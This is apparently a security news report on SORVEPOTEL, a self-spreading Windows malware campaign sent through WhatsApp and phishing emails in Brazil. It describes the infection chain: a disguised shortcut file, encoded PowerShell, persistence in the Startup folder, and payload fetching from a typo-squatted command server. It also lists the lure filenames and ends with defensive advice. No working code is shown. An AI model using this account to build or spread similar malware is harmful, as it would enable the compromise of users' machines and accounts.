In early September 2025, cybersecurity researchers identified a sophisticated malware campaign targeting Windows systems through WhatsApp messages. The malware, dubbed SORVEPOTEL, employs social engineering tactics to propagate itself, posing a significant threat to enterprise networks.
Initial Discovery and Attack Vector
The campaign was first observed in Brazil, where attackers sent phishing messages via WhatsApp containing malicious ZIP file attachments. These files bore names like RES-20250930112057.zip or ORCAMENTO114418.zip, designed to appear as legitimate documents such as receipts or budget reports. The messages urged recipients to baixa o zip no PC e abre (download the ZIP on PC and open it), explicitly targeting desktop users to maximize the malware’s reach within enterprise environments.
Alternative Delivery Methods
Further analysis by cybersecurity firm Trend Micro revealed that the attackers also utilized phishing emails to distribute the malware. These emails, often masquerading as communications from trusted institutions, carried similarly named ZIP attachments with subjects like ComprovanteSantander-75319981.682657420.zip. This multi-channel approach increased the likelihood of successful infections.
Execution and Payload Delivery
Upon extracting the ZIP file, victims encountered a deceptive Windows shortcut (.LNK) file. Executing this file triggered a hidden PowerShell script designed to download and execute the primary malware payload from attacker-controlled domains. The attack chain involved:
1. Encoded Command Execution: The .LNK file invoked an encoded command that launched a batch script in a concealed window.
2. Persistence Mechanism: The script copied itself into the Windows Startup folder to ensure it ran at each system startup.
3. Payload Retrieval: Through a series of Base64-encoded PowerShell commands, the malware generated URLs pointing to command-and-control (C2) servers and used `Net.WebClient` to fetch additional components, which were then executed in memory.
Command-and-Control Infrastructure
The attackers employed typo-squatted domains, such as sorvetenopotel.com (a play on the Portuguese phrase sorvete no pote), to blend malicious traffic with legitimate network flows, thereby evading basic detection mechanisms.
Propagation via WhatsApp Web
Once established on a system, SORVEPOTEL scanned for active WhatsApp Web sessions. If an authenticated session was found, the malware automatically propagated itself by sending the same malicious ZIP file to all contacts and groups associated with the compromised account. This automated spamming not only increased infection rates but also led to compromised accounts being banned for violating WhatsApp’s terms of service.
Implications and Recommendations
The SORVEPOTEL campaign underscores the evolving tactics of threat actors who combine social engineering, script-based execution, and rapid session hijacking to maximize reach and operational disruption. Unlike traditional malware focused on data theft, SORVEPOTEL prioritizes widespread distribution, highlighting a shift in attack strategies.
To mitigate the risks posed by such self-propagating threats, organizations should:
– Enforce Strict Endpoint Policies: Block unauthorized shortcuts and scripts to prevent malware execution.
– Disable Auto-Download Features: Configure messaging applications to prevent automatic downloading of attachments.
– Conduct Regular User Training: Educate employees on recognizing phishing attempts and the dangers of opening unsolicited attachments.
By implementing these measures, enterprises can enhance their defenses against sophisticated malware campaigns like SORVEPOTEL.
